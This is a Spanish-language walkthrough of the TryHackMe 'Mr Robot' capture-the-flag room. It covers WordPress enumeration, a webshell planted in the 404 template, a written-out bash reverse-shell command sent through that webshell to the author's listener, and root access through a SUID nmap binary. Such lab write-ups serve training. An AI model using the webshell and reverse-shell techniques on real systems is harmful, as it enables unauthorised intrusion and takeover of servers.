Mr Robot CTF
Pre-Configuración TryHackMe
Reconocimiento
Ping, IP y SO:
Enumeración
Quick Scan
Servicios y versiones (Targetted Ports):
Tenemos 3 puertos
Puerto 22
Nmap scripts
Puerto 80
Whatweb
Sitio web:
Vamos a ejecutando el fuzzing pero iremos revisando recursos...
robots.txt
Tenemos 2 recursos, vamos a ver que onda...
fsocity.dic
Este archivo lo voy a guardar.
key-1-of-3.txt
/login
Tenemos un Wordpress, vamos a ejecutar wpscan para obtener mas información ...
... Seguia enumerando los recursos y ...
Woow, tranquilo viejo!
Vaya vaya!
Intentamos estas credenciales en wp
Estamos dentro!
Vulnerabilidades
Puerto 443
Explotación
Y trata de ir al Editor de "Appearance" para justamente cambiar el 404 Template.
Este recurso es el que se carga cuando no se encuentra un elemento en el sitio...
Vamos a editarlo y verlo en acción...
Damos en "Update File"
Y ahora si vamos a un recurso que no exista!
Ahora si, aquí viene la magia...
Hemos conseguido una webshell...
Vamos a entablarnos una reverseShell...
Me pongo en escucha con netcat:
Y ejecuto en el cliente web:
10.201.88.75/asdfasdfasdf?cmd=bash -c 'bash -i >%26 /dev/tcp/10.6.22.89/4343 0>%261'
Ejecutamos...
Y nada!
Por alguan razon que no entendí a pesar de intentar en inumerables ocasiones no pude obtener una shell reversa..
Lo que hice fue usar PHP PENTESTMONKEY de revshells.com y así fue que obtuve la revshell:
La copie totalmente en el editor 404 Template y guarde cambios,
Ahora solo restaba ingresar a una url que no existia...
Y ahora si...
Vamos a mejorar la shell, ya que esta espantosa!
Si tienes duda de como obtener una FULL TTY, te dejo como hacerlo aquí...
Ya que estamos dentro
Vamos por nuestra segunda flag...Parece ser que solo robot puede leer la segunda flag... vamos a ver como cambiar de usuario o escalar privilegios...
Post Explotación
Interesante!
Vamos a crackstation
Cambiamos de usuario:
Ahora si, podríamos ir por la segunda flag
Ahora si, faltaria solo 1 flag y escalar privilegios a root!
Vamos a enumerar un poco con este usuario...
SUDO
SUID
Vamos a revisar uno por uno para ver que encontramos...
...
Rápidamente vi el binario nmap...
El cual tiene el bit SUID activo... vamos a GTFOBINS...
Tenemos algunas opciones para intentar escalar privilegios ...
Boom bitch!
Somos root!
Vamos por nuestra esquisita flag...
Comentarios
Publicar un comentario